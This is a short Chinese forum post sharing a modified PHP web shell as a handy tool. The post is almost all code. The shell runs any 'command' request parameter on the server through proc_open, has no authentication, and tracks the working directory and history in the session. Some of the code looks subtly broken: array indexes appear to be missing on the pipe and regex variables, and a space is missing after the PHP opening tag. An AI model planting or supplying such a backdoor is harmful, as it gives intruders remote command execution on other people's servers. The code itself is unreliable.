改一个PHP WEB SHELL
<?phpdefine("WINDOWS",1) ;
function GBK2UTF8($text=null){
if (!empty($text) && function_exists('iconv')){
return iconv("GBK", "UTF-8", $text);
}
return $text ;
}
function remove_blanklines($str){
return $str ? preg_replace("/(^[\r\n]*|[\r\n]+)[\s\t]*[\r\n]+/", "\n", trim($str)): '' ;
}
class Webshell {
private $default_settings = null ;
function __init__(){
$this->default_settings = array('home-directory' => '.');
$_SESSION['cwd'] = realpath($this->default_settings['home-directory']);
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}
function run(){
if (empty($_SESSION['cwd'])) {
$this->__init__();
}
$command = $_REQUEST['command'] ;
if (!empty($command)){
$command = trim($command);
$this->_exec($command);
}
}
function _exec($command){
if (!empty($command)) {
if (($i = array_search($command, $_SESSION['history'])) !== false)
unset($_SESSION['history'][$i]);
array_unshift($_SESSION['history'], $command);
$_SESSION['output'] .= (empty($_SESSION['output'])?'':"\n\n") . "$ {$command}\n" ;
/* Initialize the current working directory. */
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $command)) {
$_SESSION['cwd'] = realpath($this->default_settings['home-directory']);
}
elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
/* The current command is a 'cd' command which we have to handle
* as an internal shell command. */
if ($regs{0} == '/') {
/* Absolute path, we use it unchanged. */
$new_dir = $regs;
} else {
/* Relative path, we append it to the current working
* directory. */
$new_dir = $_SESSION['cwd'] . '/' . $regs;
}
/* Transform '/./' into '/' */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
/* Transform '//' into '/' */
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
/* Transform 'x/..' into '' */
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
/* Try to change directory. */
if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}
}
else {
// We canot use putenv() in safe mode.
if (!ini_get('safe_mode')) {
// Advice programs (ls for example) of the terminal size.
putenv('ROWS=' . 80);
putenv('COLUMNS=' . 600);
}
$shell_result = '' ;
$io = array();
$p = proc_open($command,array(1 => array('pipe', 'w'),2 => array('pipe', 'w')),$io,$_SESSION['cwd']);
/* Read output sent to stdout. */
while (!feof($io)) {
$shell_result .= htmlspecialchars(fgets($io));
}
/* Read output sent to stderr. */
while (!feof($io)) {
$shell_result .= htmlspecialchars(fgets($io));
}
fclose($io);
fclose($io);
proc_close($p);
$shell_result = (WINDOWS)? GBK2UTF8($shell_result):$shell_result;
$shell_result = remove_blanklines($shell_result);
$_SESSION['output'] .= $shell_result;
}
}
/* Build the command history for use in the JavaScript */
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
}
echo "<PRE>{$_SESSION['output']}</PRE>" ;
}
}
$inst = new Webshell();
$inst->run();
很好用
页:
[1]